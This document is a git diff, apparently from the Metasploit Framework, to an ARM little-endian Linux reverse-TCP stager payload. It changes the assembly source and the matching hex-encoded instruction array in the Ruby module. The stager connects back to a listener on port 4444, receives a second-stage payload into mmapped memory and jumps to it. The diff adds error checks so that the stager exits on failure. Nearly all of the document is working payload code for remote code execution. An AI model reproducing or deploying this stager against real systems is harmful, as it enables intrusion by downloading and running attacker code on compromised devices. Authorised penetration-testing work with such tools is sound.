diff --git a/external/source/shellcode/linux/armle/stager_sock_reverse.s b/external/source/shellcode/linux/armle/stager_sock_reverse.s index ed4e63c11c..d066a7a48c 100644 --- a/external/source/shellcode/linux/armle/stager_sock_reverse.s +++ b/external/source/shellcode/linux/armle/stager_sock_reverse.s @@ -34,12 +34,16 @@ _start: mov r1,#1 @ type = SOCK_STREAM mov r2,#6 @ protocol = IPPROTO_TCP swi 0 + cmp r0, #0 + blt failed @ int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen); mov r12,r0 @ sockfd add r7,#2 @ __NR_socket - add r1,pc,#144 @ *addr + add r1,pc,#196 @ *addr mov r2,#16 @ addrlen swi 0 + cmp r0, #0 + blt failed @ ssize_t recv(int sockfd, void *buf, size_t len, int flags); mov r0,r12 @ sockfd sub sp,#4 @@ -48,6 +52,8 @@ _start: mov r2,#4 @ len mov r3,#0 @ flags swi 0 + cmp r0, #0 + blt failed @ round length ldr r1,[sp,#0] ldr r3,=0xfffff000 @@ -63,6 +69,8 @@ _start: mov r4,r0 @ fd mov r5,#0 @ pgoffset swi 0 + cmn r0, #1 + beq failed @ recv loop @ ssize_t recv(int sockfd, void *buf, size_t len, int flags); add r7,#99 @ __NR_recv @@ -78,12 +86,20 @@ loop: ble last mov r2,#1000 @ len swi 0 + cmp r0, #0 + blt failed b loop last: add r2,#1000 @ len swi 0 + cmp r0, #0 + blt failed @ branch to code mov pc,r1 +failed: + mov r7, #1 + mov r0, #1 + swi 0 @ addr @ port: 4444 , sin_fam = 2 .word 0x5c110002 diff --git a/modules/payloads/stagers/linux/armle/reverse_tcp.rb b/modules/payloads/stagers/linux/armle/reverse_tcp.rb index 68788d086b..efd8262dcf 100644 --- a/modules/payloads/stagers/linux/armle/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/armle/reverse_tcp.rb @@ -39,6 +39,7 @@ module MetasploitModule }, 'Payload' => [ + # Generated from external/source/shellcode/linux/armle/stager_sock_reverse.s 0xe59f70f0, # ldr r7, [pc, #240] ; set 281(0x119) to r7 0xe3a00002, # mov r0, #2 0xe3a01001, # mov r1, #1 @@ -75,8 +76,8 @@ module MetasploitModule 0xe1a04000, # mov r4, r0 0xe3a05000, # mov r5, #0 0xef000000, # svc 0x00000000 ; invoke mmap2 - 0xe3500000, # cmp r0, #0 - 0xba000012, # blt 817c + 0xe3700001, # cmn r0, #1 + 0x0a000012, # beq 0xe2877063, # add r7, r7, #99 ; set 291(0x123) to r7 0xe1a01000, # mov r1, r0 0xe1a0000c, # mov r0, ip @@ -86,17 +87,17 @@ module MetasploitModule 0xe2422ffa, # sub r2, r2, #1000 0xe58d2000, # str r2, [sp] 0xe3520000, # cmp r2, #0 - 0xda000002, # ble 80fc + 0xda000004, # ble 80fc 0xe3a02ffa, # mov r2, #1000 0xef000000, # svc 0x00000000 ; invoke recv 0xe3500000, # cmp r0, #0 0xba000005, # blt 817c - 0xeafffff7, # b 80dc + 0xeafffff5, # b 80dc # last: 0xe2822ffa, # add r2, r2, #1000 0xef000000, # svc 0x00000000 ; invoke recv - 0xe3500000, # cmp r0, #0 - 0xba000000, # blt 817c + 0xe3500000, # cmp r0, #0 + 0xba000000, # blt 817c 0xe1a0f001, # mov pc, r1 # failed: 0xe3a07001, # mov r7, #1